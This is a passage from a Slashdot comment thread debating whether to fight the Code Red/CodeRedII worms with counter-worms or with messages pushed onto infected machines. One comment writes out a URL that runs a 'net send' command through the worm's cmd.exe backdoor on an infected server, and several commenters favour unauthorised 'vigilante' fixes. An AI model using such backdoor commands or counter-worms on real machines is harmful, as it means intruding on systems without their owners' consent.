      1. The infected party doesn't know they're infected. Kinda kills the analogy.

      2. Lots are cable modem users whose TOS does not let them run servers to begin with.

      3. They're causing a communal problem - excessive network lag. Why let the authority figures make all the decisions when you can just use the exploit to net send them a message telling them they're infected.

      If more people became part of the problem, we'd have a more informed group of users and tighter security.

    25. Re:Don't be a part of the problem by famillionaire · · Score: 1
      You're right about teachers not being responsible for their students' knowledge of basic ethical principles, but I think there's certainly room in schools for classes which would provide perspectives on ethics that go beyond what can be learned in the home. Things like ethical trends in history, alternate ethical systems and ethical philosophy/philosophers which have been influential could certainly make material for a class, and furthermore for an environment where students could be encouraged to work out the implications of the ethical values they learn at home and become more familiar with what they think of them.
      This doesn't respond directly to your post, since I don't think this is exactly what you were thinking of, but these are thoughts I formulated while reading your post, so they go here anyway.

    26. Re:Don't be a part of the problem by florkle · · Score: 1

      Computers aren't analogous to people, they are analogous to cars. They can be well-maintained or they can be so poorly kept that they are dangerous to their operators and other people. In some places, cars are forced to pass certain minimum standards to be operated. No such standards exist for our computers.

      A "friendly" virus that fixed problems would violate the "don't touch people's computers" concept, but where is this written that computers are inviolate? What if it was delivered via spam to invite participation ("click here to disinfect")?

      Until there is some monolithic enforcer for computer standards (i.e. "your computer is infected ma'am here is a $22 ticket for operating a poorly maintained computer") it seems like it's a wide open game.

      However "friendly viruses" don't seem to inspire their authors much.

      Since the potential legal downside exists for writing a friendly virus as a harmful one, we have a soup where the malicious dump in toxins to have fun at the expense of the helpless, and those who could help are afraid to do so.

      But then again, maybe the problem is poorly written operating systems. Macs and Unix machines are known to have fewer/no virus problems. So long as computers that are "unsafe at any speed" are popular, we will have to suffer the frequent exploding-tail-pipe-in-the-gas-tank.

      --
      -- "If you need to shoot, shoot. Don't talk" -Tuco
    27. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      Why do schools neglect an ethics curriculum?

      As someone whose parents both teach, I don't think schools should be teaching ethics, at least tough ones. Of course(?) it is wrong to cheat, start fights, etc...but it isn't the school's job to really TEACH these values. It is still parents. I wish I could count the number of times my mom has been in tears about her children's parents and how disrespectful and uncaring they are to her and their children. It is really sad. So don't go blaming schools for something you should be handling at home. Remember, you're not paying for daycare.

    28. Re:Don't be a part of the problem by meatspray · · Score: 1

      How about making a cmd script for nt/2000

      net send %computeranme% Someone infected your computer with a ______ virus, please go here to get instructions for removing it, www.cert.org/_______

      I don't think it would be so bad. I'd appreciate that info if i were infected, a large part of the ppl infected don't even know it, ppl that just installed IIS 'cause they thought they might want it later, ppl that don't use the website for anything on a regular basis and such.

    29. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      NOBODY is required to be immunized against anything by the government. School districts require it, yes. But there are people out there who have NOT been vaccinated for various "standard-vaccination" type diseases

    30. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      While I agree indiscriminately launching such an anti-worm on others' machines is flat out wrong (though one could argue their heart was in the right place, but hey, severely lacked wisdom), a controlled version of such a worm is not a bad idea. What do I mean? Well, create the worm, and make it so it will only touch machines you own. Also, if you're smart about it, make it so that it reports back to a particular machine so that it never repeats a machine it's been to. At any rate, I think a controllable anti-worm is actually a very good idea.

    31. Re:Don't be a part of the problem by blueg3 · · Score: 1

      Sure, it's unethical, but wouldn't it be great for Microsoft to release their updates as viruses that exploit the very security hole that the patch fixes? I bet it would get a lot better coverage than relying on system administrators to apply the patch themselves.

    32. Re:Don't be a part of the problem by Flammon · · Score: 1

      If you're messing with someone else's machine, you are part of the problem. No matter your intentions, or how nicely you word the "message" you deliver onto their desktop. Just don't touch it.

      I totally disagree. If someone in front of me is randomly and unknowingly firing a gun, I have the liberty to take the gun away from him. I'm not taking liberty away from him, I'm simply protecting myself and others around me. This has nothing to do with liberty since the act is being done unconsciously and liberty is the freedom to consciously act.

      If you're going to call it a virus, think of the influenza virus. A medicine is widely available on the market. It is up to the infected party to take the medicine, and it would be unethical to seize the unwitting victim and force the medicine into their bodies.

      Your argument is flawed because it's missing a few crucial details. If the person who is infected is unaware of the fact and is infecting others, I would say that you do have the right to force the medicine into their bodies - or simply give them the option of death - either by the virus or otherwise.

      Absolute liberty means anarchy and I believe most people prefer a government and laws designed to protect the majority.

    33. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      As Voltaire said, your rights start at the end of my fist. I don't agree about using a counter-virus to patch up the infected machines, I do believe that ISPs need to take a hard-line stance on their Usage agreements and cancel these accounts that are infected until such time they get the problem fixed and remain up to date on these patches. or universally ban NT and 2k being directly connected to their POS devices.

    34. Re:Don't be a part of the problem by blakestah · · Score: 5, Informative

      Your solutions should not affect the state of the infected machines. Even if you could "fix" their machine. Even telling them that their machine is infected is over the line, if you're using their machine to do it.


      Now there is ethics and there is ethics. Here is a scenario that occurred once in Baltimore. A house thief hot-wired a car. He jammed the steering wheel all the way to the side and floored the gas. The car spun and made lots of noise. Meanwhile, the thief broke into people's houses (that is besides the point). Am I ethical if I jump into the moving car and turn it off ?

      The point I am raising is that the car poses a risk to society. I am altering someone else's property in stopping it. However, I don't think it can be called unethical. The danger was created by someone who was not the owner - removal of that danger by another third party can be ethical depending on the magnitude of the danger and the alteration of the property.

      As another example, suppose my neighbor's house is burning and his 10 year old is screaming at the window, and he is not around. Am I ethical in breaking in to save his child ? In this case the answer is really clear.

      In the case of machines compromised with CodeRedII, consider the capability for MASSIVE DDOS directed at anybody launchable by anybody. Those machines are tools to be used by anyone for any reason they like. They can be used as launching points for hacks on military sites. They can be used to snoop for passwords etc. If you go onto those machines and simply remove them from the network by shutting them down (in an orderly fashion), I think you could argue rather strongly that you are taking such action in the interest of public safety.

      Ethics is rarely so cut and dried that one could claim that you should NEVER alter someone else's property.

    35. Re:Don't be a part of the problem by blakestah · · Score: 2

      What happens when the anti-virus you are running on someone's machine without their permission messes up and their machine stops running?

      You mean hypothetically my anti-virus stopped the 300 different threads on his machine that are attacking his Class A and Class B nets ?

      I would say that is EXACTLY the intention. These machines are not benign. They are screwing up net traffic.

      Worse yet, if ANYONE wanted, they could turn the machines into DDOS attacking machines focussed on a single target. Remember mafiaboy who shut down etrade and other .com sites with his DDOS ? Well, he had something like 150 machines at his disposal.

      This one is hitting something like 2 million machines. These machines need to be turned off, patched, whatever. Instead they just sit there attacking other machines.

      And again, if this came to a legal argument, there are other considerations.

      1) The admin ignored the security advisory by Microsoft two months ago.

      2) The admin ignored the CodeRed virus at the end of last month

      3) The admin ignored CodeRed this month, and CodeRedII this month.

      Basically, you have an admin who is either not monitoring or doesn't care about his server. This is not the signature of a mission critical admin - this is the signature of someone who doesn't know or doesn't care.

    36. Re:Don't be a part of the problem by Speare · · Score: 4, Insightful
      Ethics, sure. Morality, no. There's a difference.

      ethics:
      2. Being in accordance with the accepted principles of right and wrong that govern the conduct of a profession.

      moral:
      1. Of or concerned with the judgement of the goodness or badness of human action and character.

      You want an ethical lawyer, but not one who applies morality. You want an ethical doctor, but not one who judges your morality.

      Ethics is reflective, driving one's own behavior with respect for others. Morality is applied to others, and rarely implies respect for others.

      --
      [ .sig file not found ]
    37. Re:Don't be a part of the problem by IronChef · · Score: 3, Insightful

      Anyone who has to be *schooled* in ethics has already lost the battle.

      Arguably true, but the bigger issue is "what are correct ethics?" Some things nearly all people can agree on: it isn't ethical to copy someone else's work and pass it off as your own. But there are a lot of other ethics issues that will be very divisive. For example:

      "It is permissible to take a person's life if it is the only way to protect your life or the life of another."

      I have had many arguments with people who think that there is never, ever a reason to take a life, whereas I believe that self-defense is a fundamental human right. In the case of a divisive topic such as this, an "ethics class" is useless at best -- and brainwashing at worst.

      I think some kind of critical thinking training is a better idea. If you can think critically, you will develop your own ethical code.

    38. Re:Don't be a part of the problem by CharlieG · · Score: 5, Interesting
      You say:
      It is up to the infected party to take the medicine, and it would be unethical to seize the unwitting victim and force the medicine into their bodies.


      The thing is they CAN seize you and force you to take medicine IF you are determined (Usually by 2 doctors) to be a danger to yourself or others. Ever hear the term "Involuntary Commitment"?
      There ARE times when you are forced to do things
      --
      -- 73 de KG2V For the Children - RKBA! "You are what you do when it counts" - the Masso
    39. Re:Don't be a part of the problem by jaga~ · · Score: 1

      Avoiding inoculations is often very illegal.

      --

      "This is where god would go if he wanted to get off blow!"
    40. Re:Don't be a part of the problem by startled · · Score: 2

      Your solutions should not affect the state of the infected machines. Even if you could "fix" their machine. Even telling them that their machine is infected is over the line, if you're using their machine to do it.

      By this logic, sending them an e-mail notifying them that their machine is infected is unethical. After all, I am causing a change in the state of their machine. "Oh, but they have an e-mail client running, they want e-mail." But they do not want spam; is spam unethical? They also have an http server running; which responses are ethical, which are not?

      And before you attack my analogies, let's look at this awful one:
      If you're going to call it a virus, think of the influenza virus. A medicine is widely available on the market. It is up to the infected party to take the medicine, and it would be unethical to seize the unwitting victim and force the medicine into their bodies.

      Were people not quarantined for plague? If you have a contagious, deadly virus, they can force you into quarantine. Does that mean it's ethical for me to send something back that shuts off IIS, or turns off their computer? Not to mention, you can be forcibly treated for certain conditions if you pose an immediate threat to yourself and/or others; this is often invoked to treat mental illness. These boxes are certainly a threat to themselves and others-- what if someone decides to exploit this and do a DDoS? To you?

    41. Re:Don't be a part of the problem by Mr.+Slippery · · Score: 1
      existentialism is a philosophical approach that places focus upon the individual, not an ethical theory

      Yes, but there is an ethical component to it. My memory is not cooperating and my notes are at home, boxed up in the attic...but I can recall spending several days on existentialism as an ethical theory, back in a class on contemporary ethical issues. Something about the value of "heroic defiance"...?

      Me, I go with the Zen guys on this one: "If you want to get the plain truth, be not concerned with right and wrong. The conflict between right and wrong is the sickness of the mind." -- Seng-Ts'an

      --
      Tom Swiss | the infamous tms | my blog
      You cannot wash away blood with blood
    42. Re:Don't be a part of the problem by CharlieG · · Score: 2

      I don't think it's a good idea, BUT, as I said, it CAN be done

      --
      -- 73 de KG2V For the Children - RKBA! "You are what you do when it counts" - the Masso
    43. Re:Don't be a part of the problem by WNight · · Score: 3, Interesting

      I think it's YOUR ethics that are broken. Anyone who has to be *schooled* in ethics has already lost the battle.

      There are cases that it would be wrong to 'fix' someone's computer... If, for example, they ran a thriving business from it and you were being annoyed by a trojan that ran occasional port-scans, stopping their business by crashing their machine is unwarranted...

      But, in the case mentioned, a worm could be written which would seamlessly upgrade the affected computers, and close the backdoors permanently. Consider that these backdoors allow (and very likely will be used) attackers to control the machine for a DDoS, port-scanning, continued spreading of the infection, and with some of the later bugs, full access to the machine which would potentially allow all sorts of electronic theft. In this case, you're almost guilty by your inaction.

      The huge amount of damage that can be caused by each infected machine, both to the owner, and to the rest of the internet completely outweighs the owner's right to have their computer configured in a certain way.

      In many jurisdictions, inaction can be a crime. If, for instance, you see someone in mortal danger and you could have warned them, but didn't, you can often be charged with murder. (House on fire, you know someone's inside, but don't bother trying to alert them or call for help.)

      People like you really frighten me. You have a twisted sense of ethics and you want to force other people to be indoctrinated in them. Ugh.

    44. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      I don't think it's a good idea, BUT, as I said, it CAN be done

      Yes, it can be done, it's called the Baker Act.

    45. Re:Don't be a part of the problem by Rinikusu · · Score: 4, Insightful

      Hell, I'd give even another example.

      When I was 4, I was in my apartment complex running around like a, well, screaming 4 year old. One of the residents (happened to be a RN) was watching me play with my brother and then called me over to him. He took a good look at me, grabbed my hand and took me to my apartment.

      "Your son has the measles. Take him to the doctor, now."

      There was a person, completely unrelated to me, who didn't even have kids whom I could "endanger" with my measles. Was he within his rights?

      The original poster must realize that an infected machine has already been compromised by an intruder. If you walk past an apartment and see someone has forced the door open and is ransacking it, do you continue walking by? Or do you yell at the thief? Call the Cops?

      Those "infected" machines are flooding the pipe that I'm paying for, so doesn't that make them some part of a "commons" that makes them part of everyone's responsibility?

      If my neighbor is playing his music too loudly, don't I have the right to knock on his door and say "Hey, turn that down, please?"

      If I'm being constantly probed by thousands of infected machines, my internet access greatly slowed down by all the garbage in the pipe, don't I have a right to find the owners and tell them "Hey, knock that shit off. Fix your damn machine, it's hurting everyone."

      Furthermore, to pick on another pet peeve of /., doesn't the consumption of bandwidth by infected machines remind one of the arguments *against* spam? "I pay for my access, I don't want to pay for spam." Twist that into "I pay for my access, I don't want to pay for some virus propagating at my expense..."

      Just some thoughts...

      --
      If you were me, you'd be good lookin'. - six string samurai
    46. Re:Don't be a part of the problem by isomeme · · Score: 2
      If you're going to call it a virus, think of the influenza virus. A medicine is widely available on the market. It is up to the infected party to take the medicine, and it would be unethical to seize the unwitting victim and force the medicine into their bodies.

      Ah, but we (as a society) do legally require people to get vaccinated, because doing so benefits society as a whole sufficiently to justify the slight loss of personal freedom. Most people consider compulsory vaccination to be quite ethical. How does this differ from compulsory computer security measures?

      --
      When all you have is a hammer, everything looks like a skull.
    47. Re:Don't be a part of the problem by ptomblin · · Score: 2

      You're giving up liberty-- not yours, but theirs.

      So were the public health officials who dragged Typhoid Mary kicking and screaming out of the kitchens. By your reasoning, she should have been allowed to keep working.

      Even if I'm vaccinated against typhoid, I don't want a typhoid infected person handling my food.
      Even though I don't have a default.ida, I resent the fact that I had to double the number of httpds that I'm running in order to provide decent service to the people who are legitimately accessing my web server because of all the "GET /default.ida?XXXXXX...." going on.

      --
      The next Cmdr Taco duplicate will be ready soon, but subscribers can beat the rush and see it early!
    48. Re:Don't be a part of the problem by einhverfr · · Score: 2
      The point I am raising is that the car poses a risk to society. I am altering someone else's property in stopping it. However, I don't think it can be called unethical. The danger was created by someone who was not the owner - removal of that danger by another third party can be ethical depending on the magnitude of the danger and the alteration of the property.

      Interesting analogy. This is not the same thing, IMO as creating self-replicating programs to combat a virus. I don't object to writing a script that would reply to the signature packets with a buffer overrun designed to reboot the server/shut down IIS, do an rdns query and email the admin of the domain with a form letter giving the IP address of the attacking machine. That is fine and along the lines of the analogy you are mentioning. But it is not the same thing as creating a self-replicating entity to automatically do this throughout the web.

      --

      LedgerSMB: Open source Accounting/ERP
    49. Re:Don't be a part of the problem by laertes · · Score: 2, Interesting
      It is up to the infected party to take the medicine, and it would be unethical to seize the unwitting victim and force the medicine into their bodies.

      And this would be unethical how? By violating some inalienable right people have to carry disease? That's a new one. People who do not patch up their servers (or take medicines) are being negligent. If a person allows themselves to get sick, and they get other people sick, I would prefer that they get held responsible.

      Frankly, I'm getting sick of Code Red myself. I use DSL, and it crashes my modem, a lot. Nor can I write a little script; the modem needs a hard reboot. I don't even use windows, and those irresponsible system administrators are costing me more than a little pain and grievance.

      The internet is a self-policing system. Since there are no formal channels to use to force people to upgrade their servers, this extreme course of action is being pursued.

      Why do schools neglect an ethics curriculum?

      Whose ethics do we teach? Yours?

      --

      Yes, I'm still a junky. Are you still a bitch?
    50. Re:Don't be a part of the problem by Unknown+Bovine+Group · · Score: 1
      Hmm. What country are you talking about? In the US, school districts require it... and who requires you to go to school? Say it with me now: the GOVERNMENT. (see: TRUANT OFFICER)

      --
      m00.
    51. Re:Don't be a part of the problem by MindStalker · · Score: 1

      How far do you think the "using their machine" to tell them they have the virus goes? I mean, if you see that their website has an email address and email that person, is that using their machine to contact them? There is a whole range of things that can be done, from my example to actually placing a thing on their desktop saying "YOU HAVE A VIRUS".

    52. Re:Don't be a part of the problem by dankjones · · Score: 1
      In America, it is illegal not to treat TB on account of the fact that you can infect innocent bystanders. There are civil and criminal neglect penalties for being sick carelessly. Exposing someone to HIV is also a federal offence.

    53. Re:Don't be a part of the problem by DCookie · · Score: 1

      At least they won't infect anyone if their computer isn't running. :o)

      --
      My SIG is a SG-552 Commando
    54. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      I'm not sure your human virus analogy holds. We prosecute people for knowingly passing HIV and you'd have pretty good grounds for a tort suit if you could prove that someone unknowingly but negligently (i.e., knowing that they had failed to take precautions had actively taken big risks and then actively sought opportunities for contacts which could spread the virus) gave you HIV. I agree that spreading an anti-virus is unacceptable ethically. However, if we don't start creating accountability in the system for passivity as well as for malice, we're not going to see much improvement.

    55. Re:Don't be a part of the problem by newbiescum · · Score: 1
      As another example, suppose my neighbor's house is burning and his 10 year old is screaming at the window, and he is not around. Am I ethical in breaking in to save his child? In this case the answer is really clear.
      A more interesting and perhaps correct analogy is that the 10 year old is throwing things at you and other people every 5 minutes and yelling at other kids to do the same. Do you have the right to a) throw something back (counterattack/root the other box), b) tie his hands and shut his mouth (use the antivirus) or should you just find the parent? The kid in the fire is just screaming at you. He is not doing "physical" harm to you. Meanwhile, Code Red is.
    56. Re:Don't be a part of the problem by Unknown+Bovine+Group · · Score: 1
      So who's suing? The owner of the infected box? I hope he enjoys the counter-suit by me and several hundred neighbors all armed with logs showing his computer attempting to infect us.

      --
      m00.
    57. Re:Don't be a part of the problem by lionrampant · · Score: 1

      What's your source for the definitions you give of "ethics" and "morality?"

      --
      You can trust me. I'm with the government.
    58. Re:Don't be a part of the problem by Mazianni · · Score: 1

      Your analogies aren't valid, because you're talking about cases where there is the threat of physical harm to an actual person. The Code Red virus is annoying, and it's causing major problems, but it's not going to kill anyone, and it's not going to permanently damage your system.

      The only thing that you have the right to do is to tell the admin of the infected server via email. If they ignore you, run a traceroute and ask their service provider to firewall them for port 80. Then they'll have a real incentive to fix the problem.

      If you attack someone else's machine, then you're on exactly the same ethical level as the person who wrote the original virus.

      SPQA

    59. Re:Don't be a part of the problem by si1k · · Score: 1
      Speare wrote:
        • "Those who would give up essential liberty, to purchase a little temporary safety, deserve neither liberty nor safety." -- Benjamin Franklin
        Yeah, that means you. You're giving up liberty-- not yours, but theirs.
      Sorry Speare, that's not what Franklin is saying. Giving up your own liberty for some safety is like allowing your country to turn into a police state so that it will be harder for people to steal.

      That's not the same as taking away someone else's liberty to protect your own safety--which is exactly what we do every time we send a criminal to jail.

    60. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      There's a difference between leaving a note on a person's desktop and fixing the problem. In your analogy, leaving a note is equivalent to a doctor telling the patient their options. Fixing the problem is actually carrying out one of those solutions, with or without the owner's permission. It's not unethical to offer advice to another individual, especially if you believe they do not know they are infected or are incapable of fixing the problem on their own. Only when you start fixing the problem without their consent is it unethical.

    61. Re:Don't be a part of the problem by Malcontent · · Score: 2

      Your examples are not quite right.

      The thread is not about "telling them" it's about actually fixing the problem.
      Would you have wanted the neighbor to actually inoculate the child?

      Would you want your neighbor to enter your apartment and actually turn down your stereo?

      It's one thing to call the cops; it's another to take the matter into your own hands.

      --

      War is necrophilia.

    62. Re:Don't be a part of the problem by __david__ · · Score: 1
      Getting back to computers, what about where the anti-virus-virus causes inadvertent damage to the system because it has an unusual configuration, different software, etc.? So instead of fixing the webserver, it utterly kills it. That could happen very easily if you binary patch even a slightly different version of the executable than you were expecting. Then what?

      Well, then suck it up, I say... They've had plenty of time to fix their dumb server. And at least if it's dead then it's not spreading a virus around anymore!

      -David

    63. Re:Don't be a part of the problem by jvoisin · · Score: 1

      You could technically use the virus itself to tell them that they are infected.

      http://24.XXX.XXX.XXX/c/winnt/system32/cmd.exe?/ c+ "net send 127.0.0.1 PATCH YOUR WEB SERVER PLEASE!! "

      But then, would using the virus to inform the user of the infection be right? I had thought of writing a program that parses my access_log and waits 2 hours until their servers are accepting connections again and doing some messages to try and help them out.. someone is bound to take it the wrong way....

    64. Re:Don't be a part of the problem by goodtim · · Score: 0


      You made a good point, but you forgot one major thing: "ethics != law". In other words, what you do may be ethical, but that doesn't make it legal. Using the same methods as a virus to gain access to someone's computer is not legal. It doesn't matter if you are trying to defend against a virus, it's still illegal.
      Be aware though, I am not saying that it is a bad idea, because everybody knows that sometimes you have to break the law, to better society.

      --
      "Flee at once, all is discovered."
  84. Re:This has already happened by Anonymous Coward · · Score: 0

    Another analogy: the lock on the front door of your house is broken. I'm walking down the street, trying all the doorknobs, and I get into your house. Having the best motives, I fix your front door lock. I leave a note behind telling you just what I did. You come home, read the note and start looking around your house to make sure your valuables haven't been stolen, your diary read, etc. You feel your privacy has been invaded.

  85. How funny would this be... by Mustang+Matt · · Score: 2

    Find infected machines and popup a warning Window on each machine telling them they're infected.

    I don't agree with doing it whatsoever, but that would wake up a lot of sysadmins.

    --
    The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
  86. Re:old news, surely? This has been done before: by ferret4 · · Score: 1
    Hell, I forgot p tags and stuff - and previewing of course:

    slashdot.org

    bbc news

  87. Better be good by fetta · · Score: 1

    If you're going to try to write a "virus antibody," you had better be good. Otherwise you could accidentally create all kinds of problems. "Ooops! I just accidentally created a DoS attack." If you mess up and the legal authorities track you down, they may not be sympathetic to the "I was only trying to help" argument.

    Just something to think about.

    --
    ** The opinions expressed here are my own, and do not reflect those of my employers - past, present, or future**
  88. Re:The law's not on your side by DCowern · · Score: 1

    I would think you could argue successfully that you were covered under the good samaritan law (what is it? go here: What is the good samaritan law?). It is basically the law that says it's ok for you to break into a burning building to help people inside. It also protects you if, for example, you're trying to help an injured person and inadvertently cause them more harm. Food for thought.

  89. Citizen's Arrest by chrome+koran · · Score: 1

    Since the offending party is a) costing you time and money and b) harming the performance of your web server and/or network (also costing you money), I would say he is committing a crime against you. Therefore, you would be well within your rights in proceeding with a Citizen's Arrest against the offending server and remanding it into custody via root access. ;-)

    But seriously, do you think it's possible to bring a class action suit against the owners/operators of servers that still haven't downloaded the patch? They are, through their negligence, causing grave economic damage to the rest of us...Anybody out there think you can take a log of all the servers bombing you, do reverse lookups, and file a lawsuit in court? Hehehe...I'm actually surprised no one has tried this yet.

    Just thinking out loud...

    --

    It's not funny till someone gets hurt.
    1. Re:Citizen's Arrest by Mojojojo+Monkey+Inc. · · Score: 0, Troll

      Why stop there? Why not sue gun makers cause they make something that is only good for killing people? Oh wait, a bunch of idiots already tried to pull that shit and lost.

    2. Re:Citizen's Arrest by aePrime · · Score: 1

      Why not a class action suit against Microsoft? Sure, the users of IIS can't sue because of Microsoft's license agreement, but we innocent Apache users are having our bandwidth sucked because of it, and we never agreed to MS's agreement.

  90. Re:You'd spawn a war that hasnt escalated so far by SimCash · · Score: 1
    This is like saying that a certain amount of rape is inevitable, so lay back and enjoy it.

    There is a well-understood concept labeled "the broken window" that says that if you do not repair the cracked windows then eventually your neighbors do not repair their siding, then eventually no one repairs their roof, and eventually the houses become "a sort of rat-place" (thanks to Woody of "Cheers" fame).

    This syndrome is often used (correctly) to explain why you cannot let your neighbor do ugly things to their place (like letting the cars rot in the front yard) because the effects move beyond their own property. The effort to stop this slide is sometimes called "community action" (when the speaker likes the objectives) and "vigilantism" (when the speaker does not like the objectives).

    Go figure.

  91. Re:Its entirely possible by jgerman · · Score: 2
    Sure it is. I'm not saying that every case ends up like that, just that you cannot take for granted that you have a license to kill (or attack or whatever) in that situation.

    It's understandable in some ways. Say, for example, someone pulled you off the street into their home and shot you. It's your word against theirs that you didn't break in, and you're dead.

    --
    I'm the big fish in the big pond bitch.
  92. Code Red DSL problems by geckles · · Score: 1

    I'm curious; I've had problems with my DSL router as well. Switching the web admin port to something other than 80 seems to have taken care of it. Any others with a similar experience?

  93. Vigilante security by Borogove · · Score: 1

    There are lots of people saying 'don't do this, it's not ethical'. The reasoning is clear: to fix a broken machine, you'd effectively have to 'hack' into it, which is bad; there's a chance that you could break something in the process, which is also bad. It's also probably illegal, although the odds are against you being found.

    I'm not going to argue that it isn't unethical, but I do think it's still worth exploring the possibilities. Let's assume that CodeRedII isn't the last worm of its kind that we'll see. I find it fairly likely that this sort of attack will be more common, because of the possibilities it presents to hackers.

    CodeRedI and II haven't brought the Internet to its knees yet, but they offer the potential for massive denial-of-service attacks that would have the power to do tremendous damage. If script-kiddies start taking advantage of this power, what should we do?

    I wouldn't want to start trying to patch these systems myself, but I wouldn't complain about any vigilantes doing the job. Furthermore, it's possible that future CodeRed variants will not only attempt to infect other web servers, they'll also attempt to download new instructions from random web servers. If this started happening, I'd have no qualms about providing self-cleaning instructions on my own server.

    --
    There has been a major scientific break-in
  94. Another approach... by cuyler · · Score: 1

    The approach would not be to create a white hat worm to infect a computer to fix the hole, since that is considered by many to be as unethical as infecting a computer with harmful intent. It would be to just have a script to download the main page from any host that attempted to attack you (after all, they all run web servers). Then the script would search for any e-mail address (i.e. webmaster@....) on the main page, probably at the bottom, and then send an e-mail to that address informing them that your server was hit by the Code Red Worm [I | II] from their server.

    Just an idea...

  95. Re:IT Darwinism by Miss+Congeniality · · Score: 1

    I'm with you zothorn.

    Admins should be responsible for their own boxes being compromised and have to shoulder the accompanying humiliation if their own neglectfulness is revealed.

    There are too many weekend-crashcourse MCSE's getting hired for positions demanding seasoned, experienced admins. I am hopeful that some of the businesses whose scans turned up in my logs get wise to the fact that this exploit exists only as a result of irresponsibility.

    ...Of course it may also be that so many IT departments get hit first when it's layoff time.
    Some .com's in my area have one admin doing the job of three.

  96. Re:You could do that, but don't! by isomeme · · Score: 3, Insightful
    In other words, if counterviruses and antiworms became commonplace, it would turn the internet into one big war zone for autonomous code. And I can't even imagine what might result if an arms race broke out in that contest, though I expect some of its fruits would be quite frightening. I've already drawn the analogy to Core War in a previous thread.

    ...A war which would have no direct effect on those practicing safe computing, and which would encourage everyone to join that group as quickly as possible. In a network of properly secured machines, both 'good' and 'bad' agents would starve.

    --
    When all you have is a hammer, everything looks like a skull.
  97. Re:The law's not on your side by SomeoneGotMyNick · · Score: 1
    Don't fix it completely... Those who got the virus deserve it for obvious reasons. Let them remove it themselves. Just alter it so that every IP address it connects to is 127.0.0.1

    This way, the rest of the internet doesn't have to suffer.

  98. You'd better not do it wrong. by lavaforge · · Score: 1
    Even if we were to ignore ethics and whatnot, there's still a pragmatic reason for not writing a counter-virus.

    I doubt that the person who wrote the counter-virus would get it perfect on the first try, and an "almost ready" virus is a damned scary thing. What kind of excuse would you be able to give for torching a couple thousand web servers by accident?

    1. Re:You'd better not do it wrong. by Anonymous Coward · · Score: 0

      The excuse would be "because it was fun". What other excuse is there :)

  99. Possible? Yes, of course. by Tim+C · · Score: 4, Insightful

    A good idea? Absolutely not.

    Part of the problem with worms isn't just the malicious acts that they perpetrate, it's the bandwidth that they use.

    A particularly virulent worm can bring servers and routers to their knees just propagating itself. That's before it even gets the chance to do any of its intended damage. (Remember Melissa, or The Great Internet Worm?)

    Add to this very real concern the fact that striking back in this way, no matter the good intentions, is almost certainly illegal, and the whole idea is a definite no-no.

    (Yes, it does have a certain appeal - but so do many other things that are bad ideas, too)

    Cheers,

    Tim

    1. Re:Possible? Yes, of course. by AndroidCat · · Score: 1

      So don't use a worm, use a trap-door spider. (Feel free to invent a better term.)

      Write a program that sits on port 80, and when it detects a Code Red II attempt, it "fixes" the infected machine. It's still not ethical, but much safer. (It could still lead to police cars arriving to come take you away...)

      --
      One line blog. I hear that they're called Twitters now.
    2. Re:Possible? Yes, of course. by grytpype · · Score: 1

      Everyone seems to agree that releasing a white worm is a Bad Thing to Do, but shouldn't it be done anyway? If the alternative is that hundreds of thousands of IIS-running idiots are going to keep Code Red alive forever, thereby increasing latency & eating up bandwidth for everyone, why not do them the favor of fixing their machines, even if it is without their knowledge? They won't even notice it is happening. Oh, but it would be Against the Rules. And Unethical. So what? The guy who does this will be a hero if it works.

      And as far as bandwidth usage goes, the Code White worm will kill itself off as it fixes the very hosts it needs to propagate.

      --

      - Have a picture

    3. Re:Possible? Yes, of course. by spankfish · · Score: 1
      Everyone seems to agree that releasing a white worm is a Bad Thing to Do...

      You are now about to enter:

      The Lair Of The White Worm

      *bwahahahahaha*

      --

      NO TOUCH MONKEY!
    4. Re:Possible? Yes, of course. by startled · · Score: 1

      a) How does grep on your server log consume bandwidth?

      b) They would only try to disinfect "over and over" if they got probed by the host "over and over". Meaning it hadn't been disinfected.

    5. Re:Possible? Yes, of course. by Stonehand · · Score: 1

      It might consume excess bandwidth

      a) just *checking* for infected hosts, and
      b) having many copies trying to disinfect the same host, over and over...

      --
      Only the dead have seen the end of war.
    6. Re:Possible? Yes, of course. by Anonymous Coward · · Score: 0

      This is wrong. The white-hat worm would not consume nearly as much bandwidth because it would work like this: 1) A computer that had code red or code red II is infected with white hat worm. It immediately goes passive and waits for attacks. 2) A code red or code red II attack is perpetrated against this 'white' box, thus it -knows- its attacker is infected. 3) It passes the white hat worm to the attacking box, which immediately goes passive and waits for another attack from code red or code red II. Hence, it grows exponentially but ONLY attempts to contact servers that already are known to be infected!!! (And frankly saying 'you shouldn't' is a bit like saying citizens shouldn't do anything about witnessing a break-and-enter. This crap is choking the internet, and I think it's pretty justified to bloody well defend ourselves, particularly when defending ourselves causes no harm to our attacker.)

    7. Re:Possible? Yes, of course. by startled · · Score: 3, Insightful

      How the fuck does this increase bandwidth use? I've seen several comments like this modded up; what am I missing?

      Good virus resides on your computer. Computer gets scanned; good virus cleans up offending computer, installs itself. Now, rather than sending out 300 requests at a time, the offending computer is sending out nothing, unless it is scanned as well.

  100. A K5 USer has published an anti-CodeRed virus by hillct · · Score: 4, Informative

    A K5 user has provided the source to a proposed code-red anti-virus, which actively repairs remote systems infected with the code red virus. The legal implications of this are a big issue, but it's certainly an interesting code example.

    --CTH

    --

    --Got Lists? | Top 95 Star Wars Line
    1. Re:A K5 USer has published an anti-CodeRed virus by BigBlockMopar · · Score: 4, Interesting

      The legal implications of this are a big issue, but it's certainly an interesting code example.

      Yeah, it's a great idea. It would be wonderful to see someone do it, but at the same time, if you did, you're as bad as the virus writers, since this would propagate everywhere and make changes on their systems without their consent.

      For me to even academically consider such a virus, it would also have to automatically e-mail the (l)user whose machine has just been patched, and state "You are an idiot. You've been negligent in the maintenance of your webserver. A benevolent UNIX/Linux geek wrote a virus which propagates by the same method as Code Red and it has now fixed this vulnerability on your machine. To learn about real webservers, go to www.apache.org."

